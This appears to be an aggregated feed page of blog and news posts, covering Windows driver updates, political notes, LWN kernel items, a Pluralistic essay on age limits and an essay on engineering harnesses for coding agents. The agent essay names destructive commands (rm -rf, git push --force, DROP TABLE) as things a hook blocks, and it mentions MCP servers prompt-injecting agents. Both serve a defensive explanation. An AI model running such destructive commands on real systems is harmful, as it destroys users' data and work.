Friday, 15 May

21:49

Microsoft claims it’s fixing Windows Update so it won’t downgrade your graphics drivers [OSnews]

One of the top pieces of customer feedback in the graphics driver area is clear: “Windows Update downgrades my drivers.” Today, we are announcing a policy change to how display drivers are published through Windows Update — allowing 2-Part HWID + Computer Hardware ID (CHID) targeting for new devices. This change gives customers more control over their display driver of choice while preserving OEM control over the devices they ship.

↫ Garrettd at Microsoft’s Hardware Dev Center

Windows Update randomly downgrading your graphics drivers seems to be a common enough occurrence that its supposed fix deserves its own feature announcement and blog post. This is a real operating system that runs on most of the world’s PCs.

19:21

Adjacency [Penny Arcade]

It would never have occurred to me in a million years to unearth Cheeto of all things, it's completely nuts. My instinct was to say "cracked" but that means something different to the youth of today - something illicit, an etymological spur I've always feared was Fortnite-derived. But it was requested by the shivering mutants on Tumblr, and we are honor-bound to elevate these dreams, yea, unto the material world.

18:28

Urgent: Protect against datamining and manipulative fintech [Richard Stallman's Political Notes]

US citizens: call on Congress to Oppose H.R. 4801 and Protect Against datamining and manipulative fintech.

See the instructions for how to sign this letter campaign without running any nonfree JavaScript code--not trivial, but not hard.

I urge you to edit the letter's subject and text to remove the term "AI" and replace it with "snooping and manipulative fintech" or something else that rejects the marketing hype. For good measure, you could critique the term "AI" -- I did that too.

US citizens: Join with this campaign to address this issue.

To phone your congresscritter about this, the main switchboard is +1-202-224-3121.

Please spread the word.

Urgent: No Kill Switches in Cars Act [Richard Stallman's Political Notes]

US citizens: Support H.R. 1137, the "No Kill Switches in Cars Act."

I think that if someone is convicted of driving under the influence, or something close to that, it is legitimate to attach a sensor-driven kill switch to stop per from driving while inebriated.

US citizens: Join with this campaign to address this issue.

To phone your congresscritter about this, the main switchboard is +1-202-224-3121.

Please spread the word.

Urgent: End FISA law's spying on Americans [Richard Stallman's Political Notes]

US citizens: call on Congress to put an end to the FISA law's permission for warrantless spying on Americans.

The FISA court was supposed to prevent abuse of this power, but it has announced that the constraints on its operation made that impossible in practice.

US citizens: Join with this campaign to address this issue.

To phone your congresscritter about this, the main switchboard is +1-202-224-3121.

Please spread the word.

Corporate campaign against federal heat standard for workers [Richard Stallman's Political Notes]

*New Report Reveals Coordinated Corporate Campaign Against Life-Saving Federal Heat Standard for Workers.*

California's rule requiring businesses to protect their workers, with rest breaks and access to water and shade, is a big help, and extending it nationwide could avoid thousands of illnesses (some of them fatal) per year.

UK millionaires happy to pay more tax [Richard Stallman's Political Notes]

*Three-quarters of UK millionaires would be happy to pay more tax, research finds.*

Israelis-only road through the West Bank [Richard Stallman's Political Notes]

Israel is about to start building an Israelis-only road through the West Bank, designed as an excuse to exclude Palestinians from all the other roads in a central region of the West Bank — and force them all out.

Warning of domination of US government by rich [Richard Stallman's Political Notes]

Woodrow Wilson warned in his campaign in 1912 about the domination of the US government by a few rich people, and called for stripping them of their power.

At the same time, he pressured actively for racial segregation.

It is impossible to simplify Wilson to pure good or pure evil: we need to recognize both at once, in different areas of life, and judge each of them as it deserves.

JP Morgan on tax increases for foreign banks [Richard Stallman's Political Notes]

The boss of JP Morgan, a giant US bank, praises UK officials as "smart" when they reduce taxes for big foreign banks like his, and tries to threaten them with "investing less" if they might increase taxes for big foreign banks.

He is one of the arrogant rich men that Woodrow Wilson warned about. He is an enemy of Britain, and Britain should treat him as an enemy.

He is an enemy of America, too, for the same reason.

17:49

Link [Scripting News]

I wish they had an outliner in Claude. I would use it. ;-)

Link [Scripting News]

BTW, here's the JSONL version of Scripting News. It has the same data as the RSS file, but in the format that AI apps are looking for, so I am told. I thought I'd try to kick this off by pushing an RSS flow through the pipe. It's like using the Grateful Dead to boot up podcasting. I needed something to put out on the wire and I had this feed handy.

Link [Scripting News]

Thinking about adding <source:inReplyTo> to the source namespace. Its value is a URL, by default, and has an optional isPermaLink attribute, a boolean, to indicate if it's not a permalink. Works just like the guid element in RSS 2.0. I will also add support for that in the FeedLand database, and flow it out through the socket interface. Actually that's pretty close to a full spec, at least in rss.land where we take simplicity seriously. ;-)

17:07

The case of the Create­File­Mapping that always reported ERROR_ALREADY_EXISTS [The Old New Thing]

A customer reported that whenever their program called Create­File­Mapping to create a named file mapping, the call succeeded, but the resulting mapping was not the size they wanted. They requested a 1 megabyte mapping, but the mapping they got back was only 4KB, which they noticed because the program crashed once it accessed the 4097th byte. As an additional data point, if they call Get­Last­Error() after creating the file mapping, they get ERROR_ALREADY_EXISTS, suggesting that the file mapping already created. But this happens even the first time their program was run, and it even happens immediately after a reboot so there shouldn’t be any leftover mappings.

HANDLE h = CreateFileMappingW(INVALID_FILE_HANDLE, nullptr, PAGE_READWRITE,
            0, 65536, L"MyFileMapping");

My guess is that they are getting ERROR_ALREADY_EXISTS beacuse the mapping already exists. (Quelle surprise !)

After a fresh reboot, the customer used Process Explorer to search all processes to see if any of them already had a handle to their file mapping, and lo and behold, they found one: It was some companion software for their webcam, and it chose the exact same uncreative file mapping name.

The customer appended a GUID to their file mapping name, thereby removing the possibility of an accidental name collision. (Of course, there is still the possibility of an intentional name collision. Not much you can do to protect yourself against an attacker at the same or higher privilege.)

Related reading: You can name your car, and you can name your kernel objects, but there is a qualitative difference between the two.

The post The case of the <CODE>Create­File­Mapping</CODE> that always reported <CODE>ERROR_<WBR>ALREADY_<WBR>EXISTS</CODE> appeared first on The Old New Thing.

17:00

Dave's vibe coding amusement park [Scripting News]

I reached a point in my Claude work where now I can do vibe coding, in a world that I used to just be a programmer in. This means if I want to do a heavy lift, I can tell Claude what I want and it can do really big corner turns, which is something I am (as a human) terrible at, and thus resist. Today I redesigned the basic user interface of the app, and didn't read any code, I was just giving orders, and it was doing what I asked, even if every little thing it did would have been a full day's work. It's remarkable how it can do very complex things in a few seconds.

And the web framework i'm working on can do almost all the things I want to do for now, but I want to suck everything into it, and turn the whole thing into a vibe coding amusement park. So many projects I want to do, and so many I want to do with you.

16:21

Bits from Debian: New Debian Developers and Maintainers (March and April 2026) [Planet Debian]

The following contributors got their Debian Developer accounts in the last two months:

  • Filip Strömbäck (fstromback)
  • Arthur Diniz (arthurbd)
  • Manuel Traut (manut)
  • Xiyue Deng (manphiz)
  • kpcyrd (kpcyrd)

The following contributors were added as Debian Maintainers in the last two months:

  • Chris Talbot
  • Gabriel Filion
  • Mate Kukri

Congratulations!

16:07

[$] Controlling memory-management with BPF [LWN.net]

Roman Gushchin began his session in the memory-management track of the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit by saying that the community has seen a lot of proposals adding BPF-based interfaces for memory management. None of them have made their way into the mainline, though. He wanted to explore the ways in which BPF might be helpful and the obstacles that have kept BPF-based solutions out so far. This session was followed by a discussion led by Shakeel Butt on what the requirements for a new, BPF-based interface for memory control groups might look like.

15:49

Flowermaxxing Friday [Whatever]

That’s right y’all, you’re getting another flower picture! I know, I can hardly believe it myself, but spring is just turning out so beautifully here and I just feel so compelled to share the blossoms with you.

Today’s bloom is a peony (I think), from a peony bush along the side of the house:

A large, fully opened, beautiful pink peony flower.

I am thrilled to have another beautiful blooming plant in the yard, especially because it’s pink! It’s actually very close to where the wisteria is, too. Also this one is in the shape of a heart:

A peony blossom that has opened up in a way that it very closely resembles a heart. It pretty much looks just like the pink heart emoji.

That genuinely made me smile so much while I was taking the photo. Like, how cute is that.

I hope y’all are having a great start to your weekend, and that you see many blooms this spring!

-AMS

14:49

Error'd: Balmenach Bad Gateway Single Malt [The Daily WTF]

"Winner ad placement!" snarked our Peter G.

cc79d61a927848f48b2a41988ebf8c5d

Errors on this website are always a shoo-in for the weekly column. An anonymous reader wrote "I got error 500 when I tried to submit an Error'd. Please make the file uploader check if the attached file is within the file upload limit, which I think is less than 4 MB." They shared an audio error'd which may be coming along next week.

fec797b9fc3642a5b940675292dc764e

"Give us feedback - wait, did it work at all?" confused poor I_Absolutely_Want_To_Give F. "As every good service management company, ServiceNow wants feedback, above all."

3d6b7629ef5a4c90bafa3f2e6a21f663

"0 minutes does not equal 0 seconds..." sagely summarized Daniel D. "Claude like floors. I mean floor. But maybe ceil would be better applicable to this calculation, right?"

76dd1834b8394e5ebca32229fa87fb7e

Finally, this one is a real novelty, from Adam R. Is the label actually 27 years old? It certainly could be; Error 502 is a good bit older. But I think this would be our oldest Error'd yet. Adam explained: "This appears to be a real auction for a whiskey bottle whose label does, in fact, say Error 502 Bad Gateway on it. The winning bid: £130. Source: https://www.scotchwhiskyauctions.com/auctions/228-the-179th-auction/876095-balmenach-1998-27-year-old-error-502-bad-gateway-thompson-bros/"

1f77b40a37f24eabbac33a8de3aee9a7

[Advertisement] Picking up NuGet is easy. Getting good at it takes time. Download our guide to learn the best practice of NuGet for the Enterprise.

14:35

Seven new stable kernels with patches for CVE-2026-46333 [LWN.net]

Greg Kroah-Hartman has announced the 7.0.8, 6.18.31, 6.12.89, 6.6.139, 6.1.173, 5.15.207, and 5.10.256 stable kernels. These kernels contain a patch for CVE-2026-46333 a vulnerability reported by the Qualys Security Advisory team, though Jann Horn proposed a patch in 2020. The vulnerability has a proof-of-concept exploit published already. Some of the kernels have additional patches for other bugs; as always, users are advised to upgrade.

[$] HugeTLB preservation over live update [LWN.net]

Recent times have seen a lot of effort put into the implementation of the kexec handover and live update orchestrator features in the Linux kernel. But that work is not yet complete. At the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit, Pratyush Yadav led a memory-management-track session on adding the ability to preserve hugetlbfs-provided memory during the live-update process.

Security updates for Friday [LWN.net]

Security updates have been issued by Debian (ffmpeg, gsasl, nodejs, postgresql-15, postgresql-17, python3.9, and thunderbird), Fedora (expat, firefox, freerdp, GitPython, kernel, php, rust-podman-sequoia, rust-rpm-sequoia, rust-sequoia-chameleon-gnupg, rust-sequoia-git, rust-sequoia-keystore-server, rust-sequoia-octopus-librnp, rust-sequoia-openpgp, rust-sequoia-sop, rust-sequoia-sq, and rust-sequoia-sqv), Mageia (awstats, libreoffice, perl-HTTP-Tiny, and tomcat), Oracle (corosync, freerdp, gimp, git-lfs, glib2, jq, kernel, krb5, libsoup3, libtiff, openexr, thunderbird, uek-kernel, and yggdrasil), Red Hat (podman and skopeo), SUSE (amazon-ssm-agent, avahi, c-ares, cairo, containerd, cpp-httplib, dnsmasq, dovecot24, ffmpeg-4, firefox, helm, ImageMagick, iproute2, kernel, krb5, libtpms, ongres-scram, ongres-stringprep, plexus-testing, maven, maven-doxia, mojo-parent, sisu, openCryptoki, openssh, perl-Text-CSV_XS, php8, python-lxml, python-Twisted-doc, python311-click, python311-GitPython, rclone, regclient, and syncthing), and Ubuntu (avahi).

13:42

Pluralistic: No one wants a permanent gerontocracy (15 May 2026) [Pluralistic: Daily links from Cory Doctorow]

->->->->->->->->->->->->->->->->->->->->->->->->->->->->-> Top Sources: None -->

Today's links



The Supreme Court building, with the justices seated before it. The justices float, disembodied, their skins tinted green, their skulls shining through their faces. The court is titled at a spooky angle. Behind it loom dark clouds and a glowing moon.

No one wants a permanent gerontocracy (permalink)

Perhaps the most demoralizing part of Trumpismo is the fear that the people around you are so cruel and senseless that they approve of the violence, the racism, the pig-ignorant lies and rampant theft:

https://www.techdirt.com/2025/07/08/who-goes-maga/

One of the things keeping me going in these dark days is the pollster G Elliot Morris, whose "Strength in Numbers" newsletter is a reliable, robust and nuanced source of information about the way other people – including Trump's base – feel about him from moment to moment. Reading items like "A reminder: Very few people support Donald Trump's presidency" make it easier to get through the day:

https://www.gelliottmorris.com/p/a-reminder-very-few-people-support

It's a very good piece, breaking down the collapse in support for Trumpismo and confidence in Trump's mental health, even among the people who have historically stood by him, even though – incredibly! – about a third of Americans still support him and believe in his fitness to rule.

But the most interesting part of this post is the eye-popping poll result on a question that is only incidentally about Trump: the extremely broad, bipartisan support for both age limits and term limits for the House, the Senate, the Presidency and the Supreme Court.

How broad and bipartisan are these results?

  • 80% of Americans want age limits in the House and Senate (D78%, R83%; I79%);
  • Most Americans want age limits for the presidency (R73%, I61%) (the most popular age limit is 79);

  • Most Americans (65%) want an 18-year term limit for Supreme Court justices;

  • Most Americans (79%) want age limits for Supreme Court justices.

As Morris writes, this represents "a level of cross-partisan agreement that’s almost unheard of on a high-salience issue."

There are different ways to parse this out. The past decade has shown that, in the absence of a hard rule to the contrary, incumbents will stay in office long after it's obvious they should step down. That was true of Biden, who continued to campaign for a presidential term long after it was obvious that he was no longer physically and mentally capable of doing the job.

It was true of Ruth Bader-Ginsburg, whose commitment to the symbolic value of having her successor appointed by the first woman president allowed Trump to appoint the monstrous Amy Coney Barrett to a lifetime on the Supreme Court, which could well last another 30 years. It was true of Antonin Scalia, who would have handed a Supreme Court pick to the Obama administration if it wasn't for Mitch McConnell's willingness to steal a seat for Neal Gorsuch.

It's true of Kay Granger, a sitting congresswoman whose staff hid the fact that her dementia had progressed to the point that she had to be moved to an assisted living facility – while still holding office:

https://www.politico.com/news/magazine/2025/03/14/kay-granger-dementia-dc-media-00210317

It was true of Gerry Connolly, who insisted that he – not AOC – should be the head of the Oversight Committee, despite the fact that he was dying of cancer:

https://www.pbs.org/newshour/politics/rep-gerry-connolly-announces-return-of-cancer-steps-down-as-top-oversight-democrat

It was true of Dianne Feinstein, who continued to serve in the Senate despite having advanced dementia:

https://www.motherjones.com/politics/2023/04/sen-dianne-feinsteins-saga-is-a-very-public-example-of-a-national-crisis/

These politicians are wed to a system of seniority and patronage that insists that everyone who "pays their dues" should get a turn. It's a system that relies on politicians banking favors from their peers and then paying them back by anointing successors, thus requiring politicians to serve until they are ready to choose that successor.

We have created a system in which no one dares to hand over power, because to do so is to unilaterally disarm, while the other side keeps their permanent gerontocrats in positions of authority. Not only does this system starve the pipeline of young politicians who can progress to fill those new roles, it also exposes each party to significant risk. If your majority rests on a handful of seats and your caucus includes a dozen people who are actuarially certain to die soon, then the whole system could be upended by a couple of highly likely blood-clots:

https://pluralistic.net/2023/07/01/designated-survivors/

It's not that every politician over the age of 70 (or 80, or 85) is incapable of doing the job: it's that a system that runs on a mix of incumbency advantage, seniority, patronage and hubris is a bad system and the only fix for it is to put hard limits on terms – both based on how many years you hold office, and how many years you walk the earth.

The system where everyone who pays their dues gets a turn was never going to work, and that should have been especially obvious to the system's longest-tenured participants, who've had decades to notice how long-lived their colleagues are, and to compare those lifespans to the number of committee chairs, senate seats and other treasures there are to be had in the halls of power.

There are lots of good ideas – like abolishing the Electoral College or limiting political spending – that are popular with a majority of Americans, but these ideas are often very unpopular with conservatives:

https://pluralistic.net/2023/10/18/the-people-no/#tell-ya-what-i-want-what-i-really-really-want

But this is a realm in which – as Morris says – there is "almost unheard-of…cross-partisan agreement." It's the one idea that all Americans – including older Americans (at least the ones who aren't in the House, Senate or Oval Office; or on the Supreme Court) agree on: rule by permanent gerontocracy is bad, and should end.

In not so many months, both parties are going to have to pick their next presidential candidates (in the case of Republicans, it may be sooner, depending on Trump's cheeseburger intake). Those primary contests are going to implicitly raise the issue of whether we should be ruled according to the principle of "everyone who pays their dues gets a turn." But a shrewd politician could win a lot of favor among voters (and fury among their colleagues) by campaigning on age- and term-limits for high office.

(Image: Pacamah, CC BY-SA 4.0, modified)


Hey look at this (permalink)



A shelf of leatherbound history books with a gilt-stamped series title, 'The World's Famous Events.'

Object permanence (permalink)

#25yrsago The life of a celeb PA https://www.theguardian.com/education/2001/may/14/highereducation.comment

#20yrsago DOJ moves in dark of night to quash EFF wiretapping lawsuit https://web.archive.org/web/20060524092447/https://www.eff.org/deeplinks/archives/004659.php

#20yrsago WolfenGitmo: Guantanamo Bay mod for Castle Wolfenstein https://web.archive.org/web/20060520203517/https://a.parsons.edu/~evan/school/?q=node/29

#20yrsago Where does booing come from? https://web.archive.org/web/20181215223044/https://slate.com/news-and-politics/2006/05/where-do-hecklers-come-from.html

#15yrsago Steven Levy on Facebook’s ironic privacy charge against Google https://web.archive.org/web/20110514121727/https://www.wired.com/epicenter/2011/05/facebook-privacy-problems/

#15yrsago Michael Moore’s “Some Final Thoughts on the Death of Osama bin Laden” https://web.archive.org/web/20110513181408/https://www.michaelmoore.com/words/mike-friends-blog/some-final-thoughts-on-death-of-osama-bin-laden

#15yrsago DHS’s “Secure Communities” program will deport battered woman for calling 9-1-1 on her abuser https://web.archive.org/web/20110514142235/https://blogs.ocweekly.com/navelgazing/2011/05/isaura_garcia_battered_secure.php

#15yrsago TSA: we’ll search your baby and it will make the country safer https://www.loweringthebar.net/2011/05/tsa-says-baby-frisking-justified.html

#10yrsago Telcoms companies try to rescue TV by imposing Internet usage caps on cord-cutters https://www.techdirt.com/2016/05/13/isps-are-now-forcing-cord-cutters-to-subscribe-to-tv-if-they-want-to-avoid-usage-caps/

#10yrsago The weird, humiliating nicknames George W Bush gave to everyone https://en.wikipedia.org/wiki/List_of_nicknames_used_by_George_W._Bush

#10yrsago “Tendril perversion”: when one loop of a coil goes the other way https://en.wikipedia.org/wiki/Tendril_perversion

#10yrsago Clicking “Buy now” doesn’t “buy” anything, but people think it does https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2778072

#5yrsago Uber (Ch)eats https://pluralistic.net/2021/05/13/uber-cheats/#50-companies

#5yrsago The Democratic establishment https://pluralistic.net/2021/05/13/uber-cheats/#party-bosses

#1yrago Who Broke the Internet? Part II https://pluralistic.net/2025/05/13/ctrl-ctrl-ctrl/#free-dmitry


Upcoming appearances (permalink)

A photo of me onstage, giving a speech, pounding the podium.



A screenshot of me at my desk, doing a livecast.

Recent appearances (permalink)



A grid of my books with Will Stahle covers..

Latest books (permalink)



A cardboard book box with the Macmillan logo.

Upcoming books (permalink)

  • "The Reverse-Centaur's Guide to AI," a short book about being a better AI critic, Farrar, Straus and Giroux, June 2026 (https://us.macmillan.com/books/9780374621568/thereversecentaursguidetolifeafterai/)
  • "Enshittification, Why Everything Suddenly Got Worse and What to Do About It" (the graphic novel), Firstsecond, 2026

  • "The Post-American Internet," a geopolitical sequel of sorts to Enshittification, Farrar, Straus and Giroux, 2027

  • "Unauthorized Bread": a middle-grades graphic novel adapted from my novella about refugees, toasters and DRM, FirstSecond, April 20, 2027

  • "The Memex Method," Farrar, Straus, Giroux, 2027



Colophon (permalink)

Today's top sources:

Currently writing: "The Post-American Internet," a sequel to "Enshittification," about the better world the rest of us get to have now that Trump has torched America. Third draft completed. Submitted to editor.

  • "The Reverse Centaur's Guide to AI," a short book for Farrar, Straus and Giroux about being an effective AI critic. LEGAL REVIEW AND COPYEDIT COMPLETE.
  • "The Post-American Internet," a short book about internet policy in the age of Trumpism. PLANNING.

  • A Little Brother short story about DIY insulin PLANNING


This work – excluding any serialized fiction – is licensed under a Creative Commons Attribution 4.0 license. That means you can use it any way you like, including commercially, provided that you attribute it to me, Cory Doctorow, and include a link to pluralistic.net.

https://creativecommons.org/licenses/by/4.0/

Quotations and images are not included in this license; they are included either under a limitation or exception to copyright, or on the basis of a separate license. Please exercise caution.


How to get Pluralistic:

Blog (no ads, tracking, or data-collection):

Pluralistic.net

Newsletter (no ads, tracking, or data-collection):

https://pluralistic.net/plura-list

Mastodon (no ads, tracking, or data-collection):

https://mamot.fr/@pluralistic

Bluesky (no ads, possible tracking and data-collection):

https://bsky.app/profile/doctorow.pluralistic.net

Medium (no ads, paywalled):

https://doctorow.medium.com/

Tumblr (mass-scale, unrestricted, third-party surveillance and advertising):

https://mostlysignssomeportents.tumblr.com/tagged/pluralistic

"When life gives you SARS, you make sarsaparilla" -Joey "Accordion Guy" DeVilla

READ CAREFULLY: By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

ISSN: 3066-764X

13:07

Agent Harness Engineering [Radar]

This article was originally published on Addy Osmani’s blog. It’s being reposted here with the author’s permission.

Roughly: Anytime you find an agent makes a mistake, you take the time to engineer a solution such that the agent never makes that mistake again.

We’ve spent the last two years arguing about models. Which one is smartest, which one writes the cleanest React, which one hallucinates less. That conversation is fine as far as it goes, but it’s missing the other half of the system. The model is one input into a running agent. The rest is the harness: the prompts, tools, context policies, hooks, sandboxes, subagents, feedback loops, and recovery paths wrapped around the model so it can actually finish something.

A decent model with a great harness beats a great model with a bad harness. I’ve watched this play out on my own work over and over. And increasingly the interesting engineering isn’t in picking the model; it’s in designing the scaffolding around it.

That discipline now has a name. Viv Trivedy coined the term harness engineering, and his “Anatomy of an Agent Harness” post is the cleanest derivation of what a harness actually is and why each piece exists. Dex Horthy has been tracking the pattern as it emerges. HumanLayer frames most agent failures as “skill issues” that come down to configuration rather than model weights. Anthropic’s engineering team has published what I think is the best public breakdown of how to design a harness for long-running work. And Birgitta Böckeler has a good overview of what this looks like from the user’s side.

This post is my attempt to pull those threads together.

What is a harness, really?

Viv’s one-liner does most of the work:

Agent = Model + Harness. If you’re not the model, you’re the harness.

A harness is every piece of code, configuration, and execution logic that isn’t the model itself. A raw model is not an agent. It becomes one once a harness gives it state, tool execution, feedback loops, and enforceable constraints.

The model is one chip on the board. The harness is everything else that makes it useful.

Concretely, a harness includes:

  • System prompts, CLAUDE.md, AGENTS.md, skill files, and subagent prompts
  • Tools, skills, MCP servers, and their descriptions
  • Bundled infrastructure (filesystem, sandbox, browser)
  • Orchestration logic (subagent spawning, handoffs, model routing)
  • Hooks and middleware for deterministic execution (compaction, continuation, lint checks)
  • Observability (logs, traces, cost and latency metering)

Simon Willison reduces the loop part to its essence: an agent is a system that “runs tools in a loop to achieve a goal.” The skill is in the design of both the tools and the loop.

If that sounds like a lot of surface area, it is. And it’s your surface area, not the model provider’s. Claude Code, Cursor, Codex, Aider, Cline: These are all harnesses. The model underneath is sometimes the same, but the behavior you experience is dominated by what the harness does.

coding agent = AI model(s) + harness

This equation, articulated by Viv and echoed by HumanLayer, is where the work actually lives. The debate over the left-hand side is loud. Most of the actual leverage sits on the right.

The “skill issue” reframe

There’s a pattern I watch engineers fall into. The agent does something dumb, the engineer blames the model, and the blame gets filed under “wait for the next version.”

The harness-engineering mindset rejects that default. The failure is usually legible. The agent didn’t know about a convention, so you add it to AGENTS.md. The agent ran a destructive command, so you add a hook that blocks it. The agent got lost in a 40-step task, so you split it into a planner and an executor. The agent kept “finishing” broken code, so you wire a typecheck back-pressure signal into the loop.

HumanLayer says: “It’s not a model problem. It’s a configuration problem.” Harness engineering is what happens when you take that seriously.

There’s a striking data point that shows up in both Viv’s write-up and HumanLayer’s. On Terminal Bench 2.0, Claude Opus 4.6 running inside Claude Code scores far lower than the same model running in a custom harness. Viv’s team moved a coding agent from Top 30 to Top 5 by changing only the harness. Models get posttraining coupled to the harness they were trained against. Moving them into a different harness, with better tools for your codebase, a tighter prompt, and sharper backpressure, can unlock capability the original harness was leaving on the floor.

This is the opposite of the “just wait for GPT-6” narrative. The gap between what today’s models can do and what you see them doing is largely a harness gap.

The ratchet: Every mistake becomes a rule

The most important habit in harness engineering is treating agent mistakes as permanent signals. Not one-off stories to laugh about, not “bad runs” to retry. Signals.

If the agent ships a PR with a commented-out test and I merge it by accident, that’s an input. The next version of my AGENTS.md says “never comment out tests; delete them or fix them.” The next version of my precommit hook greps for .skip( and xit( in the diff. The next version of my reviewer subagent flags commented-out tests as a blocker.

You only add constraints when you’ve seen a real failure. You only remove them when a capable model has made them redundant. Every line in a good AGENTS.md should be traceable back to a specific thing that went wrong.

This is also why harness engineering is a discipline rather than a framework. The right harness for your codebase is shaped by your failure history. You can’t download it.

Working backward from behavior

The framing from Viv that I find most useful when I’m actually designing a harness is to start from the behavior you want and derive the harness piece that delivers it. His pattern: behavior we want (or want to fix) → harness design to help the model achieve this.

Every harness feature is a bridge across a specific thing the model can't do on its own

The useful thing about deriving it this way is that every harness component has a specific job. If you can’t name the behavior a component exists to deliver, it probably shouldn’t be there.

The rest of this section walks the pieces in roughly the order Viv does, with the specific patterns I’ve found worth stealing.

Filesystem and Git: Durable state

The filesystem is the most foundational primitive, and it tends to be underrated because it’s boring. Models can only directly operate on what fits in context. Without a filesystem, you’re copy-pasting into a chat window, and that isn’t a workflow.

Once you have a filesystem, the agent gets a workspace to read data, code, and docs; a place to offload intermediate work instead of holding it in context; and a surface where multiple agents and humans can coordinate through shared files. Adding Git on top gives you versioning for free, so the agent can track progress, roll back errors, and branch experiments.

Most of the other harness primitives end up pointing at the filesystem for something.

Bash and code execution: The general-purpose tool

The main agent loop today is a ReAct loop: The model reasons, takes an action via a tool call, observes the result, and repeats. But a harness can only execute the tools it has logic for. You can try to prebuild a tool for every possible action, or you can give the agent bash and let it build the tools it needs on the fly.

Willison’s take on this is that agents already excel at shell commands; most tasks collapse to a few well-chosen CLI invocations. Harnesses still ship focused tools, but bash plus code execution has become the default general-purpose strategy for autonomous problem solving. It’s the difference between teaching someone to use a single kitchen gadget and handing them a kitchen.

Sandboxes and default tooling

Bash is only useful if it runs somewhere safe. Running agent-generated code on your laptop is risky, and a single local environment doesn’t scale to many parallel agents.

Sandboxes give agents an isolated operating environment. Instead of executing locally, the harness connects to a sandbox to run code, inspect files, install dependencies, and verify work. You can allow-list commands, enforce network isolation, spin up new environments on demand, and tear them down when the task is done.

A good sandbox ships with good defaults: preinstalled language runtimes and packages, Git and test CLIs, a headless browser for web interaction. Browsers, logs, screenshots, and test runners are what let the agent observe its own work and close the self-verification loop.

The model doesn’t configure its execution environment. Deciding where the agent runs, what’s available, and how it verifies its output are all harness-level calls.

Memory and search: Continual learning

Models have no additional knowledge beyond their weights and what’s currently in context. Without the ability to edit weights, the only way to add knowledge is through context injection.

The filesystem is again the primitive. Harnesses support memory file standards like AGENTS.md that get injected on every start. As the agent edits that file, the harness reloads it, and knowledge from one session carries into the next. This is a crude but effective form of continual learning.

For knowledge that didn’t exist at training time (new library versions, current docs, today’s data), web search and MCP tools like Context7 bridge the cutoff. These are useful primitives to bake into the harness rather than leaving to the user.

Battling context rot

Context rot is the observation that models get worse at reasoning and completing tasks as the context window fills up. Context is scarce, and harnesses are largely delivery mechanisms for good context engineering.

Three techniques show up repeatedly:

Compaction. When the window gets close to full, something has to give. Letting the API error is not an option for a production harness, so the harness intelligently summarizes and offloads older context so the agent can keep working.

Tool-call offloading. Large tool outputs (think 2,000-line log files) clutter context without adding much signal. The harness keeps the head and tail tokens above a threshold and offloads the full output to the filesystem, where the agent can read it on demand.

Skills with progressive disclosure. Loading every tool and MCP into context at startup degrades performance before the agent takes a single action. Skills let the harness reveal instructions and tools only when the task actually calls for them.

Anthropic’s harness post adds one more technique for the really long jobs: full context resets, where the harness tears the session down and rebuilds it from a compact handoff file. They’re explicit that compaction alone wasn’t sufficient for long tasks; sometimes you need to start fresh with a structured brief. This is closer to how humans onboard a new engineer than to how we usually think about “memory.”

Long-horizon execution: Ralph loops, planning, verification

Autonomous long-horizon work is the holy grail and the hardest thing to get right. Today’s models suffer from early stopping, poor decomposition of complex problems, and incoherence as work stretches across multiple context windows. The harness has to design around all of that.

I’ve written about autonomous coding loops like the Ralph loop before in self-improving agents and in my 2026 trends piece, but it’s worth restating in this framing: A hook intercepts the model’s attempt to exit and reinjects the original prompt into a fresh context window, forcing the agent to continue against a completion goal. Each iteration starts clean but reads state from the previous one through the filesystem. It’s a surprisingly simple trick for turning a single-session agent into a multisession one, and it’s the kind of primitive you’d never derive from “just use a smarter model.”

Planning is when the model decomposes a goal into a sequence of steps, usually into a plan file on disk. The harness supports this with prompting and reminders about how to use the plan file. After each step, the agent checks its work via self-verification: Hooks run a predefined test suite and loop failures back to the model with the error text, or the model reviews its own output against explicit criteria.

Planner/generator/evaluator splits. Anthropic’s long-running harness work is explicit that separating generation from evaluation into distinct agents outperforms self-evaluation, because agents reliably skew positive when grading their own work. It’s GANs for prose. The related pattern is the sprint contract, where the generator and evaluator negotiate what “done” actually means before code gets written. In my own workflows, writing down the done condition before starting has caught more scope drift than any prompt change I’ve ever made.

Hooks: The enforcement layer

Hooks are what separate “I told the agent to do X” from “the system enforces X.”

A hook is a script that runs at a specific lifecycle point: before a tool call, after a file edit, before commit, on session start. They’re the right place for things the agent should never forget but often does. Run typecheck and lint and tests after every edit and surface failures. Block destructive bash (rm -rf, git push --force, DROP TABLE). Require approval before opening a PR or pushing to main. Auto-format on write so the agent doesn’t waste tokens on whitespace.

The principle HumanLayer highlights and I’ve come to agree with is: Success is silent; failures are verbose. If typecheck passes, the agent hears nothing. If it fails, the error text gets injected into the loop and the agent self-corrects. That makes the feedback loop almost free in the common case and directly actionable when something goes wrong.

AGENTS.md and tool choice

The flat markdown rulebook at the root of your repo is still the single highest-leverage configuration point, because it lands in the system prompt every turn. Conventions go here: package manager, test framework, formatting, “never touch /legacy,” “always use our logger.” Two hard-won lessons:

Keep it short. HumanLayer keeps theirs under 60 lines. Every line is competing for attention, and more rules make each rule matter less. Pilot’s checklist, not style guide.

Earn each line. Rules should trace to a specific past failure or a hard external constraint. If they don’t, they’re noise. Ratchet; don’t brainstorm.

Same discipline applies to tools. Each tool’s name, description, and schema gets stamped into the prompt every request. Ten focused tools outperform fifty overlapping ones because the model can hold the menu in its head. HumanLayer also flags a real security concern here: tool descriptions populate the prompt, so any MCP server you install is trusted text the model will read. A sloppy or malicious MCP can prompt-inject your agent before you’ve typed anything.

What this looks like in production

The clearest public picture I’ve seen of a mature harness is Fareed Khan’s (estimated) breakdown of Claude Code’s architecture.

Almost every concept from the previous section shows up on this diagram as a named component. Context injection is the knowledge layer. Loop state lives in the memory store and the worktree isolator. Destructive-action hooks sit behind the permission gate. Subagent context firewalls are the entire multi-agent layer. The tool dispatch registry is where MCP servers and bash both plug in. Khan’s argument is the same as Viv’s, just worked through a shipping product: Claude Code’s trajectory is about the harness at least as much as about the model underneath it.

